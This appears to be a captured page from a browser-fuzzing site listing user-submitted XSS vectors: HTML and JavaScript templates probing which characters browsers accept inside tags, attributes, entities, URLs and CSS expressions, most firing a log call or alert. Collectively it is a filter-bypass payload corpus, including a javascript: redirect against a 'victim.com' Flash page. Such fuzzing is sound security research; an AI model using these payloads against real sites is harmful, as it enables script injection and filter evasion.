Featured vector

Chrome 0.0
<a href="/0x5cgoogle.com" id="fuzzelement1">asdf</a> <script> if(document.getElementById('fuzzelement1').hostname=="google.com") { alert(1); } </script>

5,453,920 Successful fuzzes

Fuzz Vectors

Searching for "XSS"

All vectors

Description Vector Created by
Characters that break out of css urls latest <div id="fuzzelement*num*" style="background:url(about:blank?*chr*;color:#000000;x:);"></div> @garethheyes
Characters that end script tags <script*chr*test>logChr(*num*)</script> @JohnathanKuskos
Characters allowed before tagname in IE v2 <*chr*div style="x:expression(logChr(*num*))"> @albinowax
Possibility of XSS via lead bytes <html> <head> <title>Possibility of XSS via lead bytes... @irsdl</title> <!-- <meta charset="utf-8"> or <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> Ref: https://code.google.com/p/doctype-mirror/wiki/MetaCharsetAttribute --> </head> <body> <p><input size=20 value="*chr*"></p> <p><input size=20 value="<script>logChr(*num*)</script>"></p> <!-- References: http://powerofcommunity.net/poc2008/hasegawa.pptx http://websecurity.com.ua/2928/ https://bugzilla.mozilla.org/show_bug.cgi?id=690225 --> </body> </html> @irsdl
Characters allowed at the start of a namespace <*chr*foo:img src="xx:xx" id="baz*num*" /> <script> if(document.getElementById("baz*num*")) { logChr(*num*); } </script> @agasfasgasdasds
rand chr after opening tag <*chr*img/src=xx:xx on*chr*error=logChr(*num*)> @mehimansu
prompt <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> @sharath_unni
Characters that close a HTML comment 0021 <!--*chr*><img src=xxx:x onerror=log(*num*)> --> @matttiko
script var separator <script> var a = "olol123*chr* <logChr(*num*)// </script> @i_bo0om
svg animate onbegin <svg id="svg" xmlns="http://www.w3.org/2000/svg"> <rect id="rectID" width="100" height="100" fill="green"> <animate id="selfID" onbegin=logChr(*num*) attributeName="x" begin="0s; selfID.end" dur="0.5s" from="0" to="100"/> </rect> </svg> @JohnathanKuskos
char after lt and before still valid html <*chr*,script>logChr(*num*);</script> @p_laguna
object data separator <object*chr*data="data:text/html;base64,PHNjcmlwdD5sb2dDaHIoKm51bSopPC9zY3JpcHQ+"></object> @i_bo0om
Characters that can be used to terminate entities in an href <a href="javascript&colon*chr*log(*num*)" id="fuzzelement*num*">test</a> @tifkin_
Data URI What can replace the in data <script src="data*chr*,log(*num*)"></script> @skeptic_fx
Characters allowed between & and # in HTML entities in style attribute <div style="x:expression(l&*chr*#x6F;gChr(*num*))"> @tifkin_
fssadf dfads fdasf <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> @phpdevops
Characters to break VBScript comments <script language="vbscript"> '*chr*log(*num*)' </script> @0x6D6172696F
im fish <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> @Mramydnei
Characters allowed after domain <a href="http://google.com*chr*breakme" id="fuzzelement*num*">test</a> @avlidienbrunn
Characters allowed before http <a href="http://*chr*google.com" id="fuzzelement*num*">test</a> @avlidienbrunn
Protocols before Javascript to run code by using Flash navigateURL <script> setTimeout("if(document.getElementById('myframe*dataprotocols*').contentWindow.document.location.hash.substring(1)) customLog('*dataprotocols*');",1000) </script> <iframe id="myframe*dataprotocols*" src="http://victim.com/testme/flashtest/link_protocol_test.swf?input=*dataprotocols*javascript:document.location='http://shazzer.co.uk/%23@irsdl'"></iframe> @irsdl
chars allowed between js comment v2 <script>logChr(*num*)*chr*'</script> @insertScript
chars allowed between js comment <script>logChr(*num*)/*chr*/'</script> @insertScript
allowed char in js comment <script>logChr(*num*)<*chr*!-- '</script> @insertScript
img onload with only one char in src <img src=*chr* onload=logChr(*num*)> @insertScript
characters which turn into a comment <svg><script>lo<*chr*>gChr(*num*)</script></svg> @insertScript
char after lt still valid html <*chr*a href=x onerror=logChr(*num*)> @ethicalhack3r
lt eating char log <img src=x *chr*> onerror="console.log(document.getElementsByTagName('html')[0].innerHTML)"> @insertScript
lt eating char v2 <img src=x *chr*> onerror=logChr(*num*)> @insertScript
lt eating char <img src=x *chr*> onerror=logChr(*num*)> @insertScript
HTML Entity in between & and # <img src=xx:xx onerror="&*chr*#X61;lert(*num*);logChr(*num*)"> @MisterJyu
Characters allowed before slashes no protocol <a href="*chr*//google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed inside slashes no protocol <a href="/*chr*/google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed instead of slash 2 <a href="http:*chr**chr*google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed instead of slash <a href="http:*chr*google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed after slash <a href="http:/*chr*/google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed inside http <a href="ht*chr*tp://google.com" id="fuzzelement*num*">test</a> @garethheyes
Valid chars before img word in img tag <!-- sample vector --> <*chr*img src=xx:xx onerror=logChr(*num*)> @ontrif
meta refresh tag content attribute url overwrite <!-- sample vector --> <META HTTP-EQUIV="refresh" CONTENT="0.1; URL=javascript:void()//?*chr*;URL=javascript:logChr(*num*)//"> @olemoudi
Characters between time and URL in meta redirects <meta http-equiv=refresh content="0*chr*javascript:logChr('*num*')"> @avlidienbrunn
Characters allowed instead of forward slash in url <a href="*chr**chr*google.com" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed instead of colon in js url <a href="javascript*chr*alert(1)" id="fuzzelement*num*">test</a> @garethheyes
Tags that have the onload event <*datahtmlelements* onload="customLog('*datahtmlelements*')">test</*datahtmlelements*> @garethheyes
Characters consuming spaces between lt and tag name <*chr* script>logChr(*num*)</script> @blubbfiction
possible chars in base64 encoding <svg><script xlink:href=YWxl*chr*cnQoMSk= ></script> @heyheyheyhey10
Replacement for s in script tag <*chr*cript>logChr(*num*)</script> @blubbfiction
Replacement for lt in tag *chr*script>logChr(*num*)</script> @blubbfiction
Characters inside script tag name <scr*chr*ipt>logChr(*num*)</script> @blubbfiction
Characters between lt and tag name <*chr*script>logChr(*num*)</script> @blubbfiction
char for firing onload event <img src=*chr* onload=logChr(*num*)> @heyheyheyhey10
html dataentities before event handler <img src="x" asdf/="_=" alt=" *dataentities*onerror=logChr(*num*) //"> @testacc40590139
Character allowed after the slash for end script tag <script>alert(logChr(*num*))</*chr*script> @MisterJyu
Character allowed before the slash for end script tag <script>alert(logChr(*num*))<*chr*/script> @MisterJyu
Characters that break out of script variables <script>x='<*chr*script><img src=xx:xx onerror=logChr(*num*)>';</script> @garethheyes
Attribute separators <img*chr*src=xx:xx*chr*onerror=logChr(*num*)> @garethheyes
Characters separating attributes without quotes after hash <img src=xx:xx#*chr*/onerror=logChr(*num*)> @garethheyes
Characters separating attributes without quotes <img src=xx:xx alt=`*chr*/onerror=logChr(*num*)//`> @garethheyes
JS in img src for selfxss <img src="http://media.merchantcircle.com/37102644/Alert1_Logo_without_tag_full.jpeg*chr*javascript:alert(*chr*)"> @ethicalhack3r
Char after lt <*chr*script>alert(*num*)</script> @ethicalhack3r
Determine what character can be at the end of the javascript but before the colon <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> <a href=javascript*chr*:alert(*num*)>*num*</a> @MisterJyu
Characters to end script tag via JavaScript regex 002 <script>log(*num*,1</script*chr*//)</script> @0x6D6172696F
Characters to end script tag via JavaScript regex 001 <script>log(*num*,1</script*chr*/)</script> @0x6D6172696F
Execute XSS through previousSibling replace in DOM using innerHTML and escaping right angle bracket <body> §iframe onload=confirm(/xss/)&gt; <img src=x:x onerror="innerHTML=previousSibling.nodeValue.replace('§','<')"> </body> *urlenc* @secalert
Alternatives to = in attributes <img src=# onerror*chr*"log(*num*)" > @albinowax
Characters which break attributes without quotes <b id="id*num*" x=begin*chr*end >`'"></b><script>if (!/begin.end/.test(document.getElementById('id*num*').getAttribute('x'))) { log(*num*);}</script> @shafigullin
Characters allowed after ampersand in named character references <a href="javascript&*chr*colon;log(*num*)" id="fuzzelement*num*">test</a> @_cweb
Characters ending HTML closing tags (HTML4) <style></style*chr*<img src="about:blank" onerror=log(*num*)//></style> @0x6D6172696F
Characters consuming backslashes and breaking JS strings <script>a='abc\*chr*\';log(*num*)//def';</script> @0x6D6172696F
Characters to separate class names in class attributes <div class="foo*num**chr*bar">HELLO</div> <script>document.getElementsByClassName('foo*num*')[0]?log(*num*):0</script> @0x6D6172696F
Determine what character can replace / in end tags <script>log(*num*)<*chr*script> @MisterJyu
Characters that close a HTML comment 002 <!--*chr*<img src=xxx:x onerror=log(*num*)> --> @0x6D6172696F
Characters that close HTML tags <script>log(*num*)</script*chr* @0x6D6172696F
Characters allowed after script <script*chr*>log(*num*)</script> @garethheyes
Single character breaking innerHTML copy <div id="fuzzelement*num*"> <div title="*chr*style=color:#FF1133;" id="copyTarget*num*">*num* - test</div> </div> @thewildcat
Entity character breaking innerHTML copy <div id="fuzzelement*num*"> <div title="&#x*hex6*;style=color:#FF1133" id="copyTarget*num*">*num* - test</div> </div> @thewildcat
determine what characters can be inside a script tag "`'><sc*chr*ript>log(*num*)</sc*chr*ript> @MisterJyu
determine any chars can go between the onerror attributes <img src="x"*chr**chr*o*chr*n*chr*error="alert(*num*)"> @MisterJyu
Replacement for greater and less than signs (revised) *chr*script*chr* log(*num*) *chr**chr*script*chr @MisterJyu
Replacement for greater and less than signs *chr*script*chr alert(1) *chr**chr*script*chr @MisterJyu
Characters breaking innerHTML copy <div id="fuzzelement*num*"> <div title="*chr**chr*style=color:#FF1133" id="copyTarget*num*">*num* - test</div> </div> @thewildcat
Characters escaping JS comment delimiters 001 <script>/* **chr*/log(*num*)// */</script> @0x6D6172696F
Characters breaking CSS strings allowing expression "'`>ABC<div style="font-family:'foo*chr*;x:expression(log(*num*));/*';">DEF @0x6D6172696F
Characters ending CSS values allowing expressions "'`>ABC<div style="font-family:'foo'*chr*x:expression(log(*num*));/*';">DEF @0x6D6172696F
Characters breaking JavaScript Regex delimiter "'`><script>a=/hello;*chr*;i=0;log(*num*);a/i;</script> @0x6D6172696F
Characters in script inside XML elements 004 "'`><p><svg><script>a='hello*chr*;log(*num*)//';</script></p> @0x6D6172696F
Characters in script inside XML elements 003 <p><svg><script>*chr*og(*num*)</script></p> @0x6D6172696F
Characters in script inside XML elements 002 <p><svg><script>l*chr*og(*num*)</script></p> @0x6D6172696F
Characters in script inside XML elements 001 <p><svg><script>*chr*log(*num*)</script></p> @0x6D6172696F
Characters allowed for padding in a VBS URI 002 <iframe src="vbscript:log*chr**num*"></iframe> @0x6D6172696F
Characters allowed for padding in a VBS URI 001 <iframe src="vbs:log*chr**num*"></iframe> @0x6D6172696F
Characters allowed between CSS expression chars 02 ABC<div style="x:expression*chr*(log(*num*))">DEF @0x6D6172696F
Characters allowed between CSS expression chars 01 ABC<div style="x:exp*chr*ression(log(*num*))">DEF @0x6D6172696F
Characters allowed between CSS prop and expression ABC<div style="x*chr*expression(log(*num*))">DEF @0x6D6172696F
Characters allowed for padding in a data URI 003 <script src="data:text/plain*chr*log(*num*)"></script> @0x6D6172696F
Characters allowed for padding in a data URI 002 <script src="data:*chr*,log(*num*)"></script> @0x6D6172696F
Characters allowed for padding in a data URI 001 <script src="data:text/plain,lo*chr*g(*num*)"></script> @0x6D6172696F
Characters before img "'`><*chr*img src=xxx:x onerror=log(*num*)> @garethheyes
Characters before script '`"><*chr*script>log(*num*)</script> @garethheyes
Characters in between protocol in js url <a href="javas*chr*cript:alert(1)" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed after attribute name `"'><img src=xxx:x onerror*chr*=log(*num*)> @garethheyes
Characters allowed before protocol in js url <a href="*chr*javascript:alert(1)" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed before colon in js url <a href="javascript*chr*:alert(1)" id="fuzzelement*num*">test</a> @garethheyes
Characters allowed before CSS properties '"`><div id="fuzzelement*num*" style="*chr*color:#000000;"></div> @garethheyes
Characters allowed before attribute name `"'><img src=xxx:x *chr*onerror=log(*num*)> @garethheyes